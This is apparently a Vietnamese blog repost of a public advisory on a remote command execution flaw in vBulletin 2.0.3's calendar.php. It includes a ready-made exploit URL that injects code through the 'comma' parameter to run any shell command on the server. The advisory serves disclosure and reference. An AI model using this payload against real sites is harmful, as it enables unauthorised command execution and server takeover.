Trang

vBulletin 2.0.3 Calendar.PHP Command Execution Vulnerability

Source: http://www.securityfocus.com/bid/5820/info

 
A remote command execution vulnerability has been reported for vBulletin. The vulnerability is due to vBulletin failing to properly sanitize user-supplied input from URI parameters.
 
An attacker can exploit this vulnerability to execute malicious commands on the vulnerable system.
 
http://www.example.com/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60<command>%20%60;die();echo%22
 
where <command> signifies a command to be executed on the system.

Nguồn: http://www.exploit-db.com/exploits/21874/

Chú Ý:

Coppy phải ghi rõ nguồn Dương-UG Blog's
 

0 nhận xét:

Đăng nhận xét

:) :( :)) :(( =))

Copyright © Dương-UG Blog's - Nguyễn Bình Dương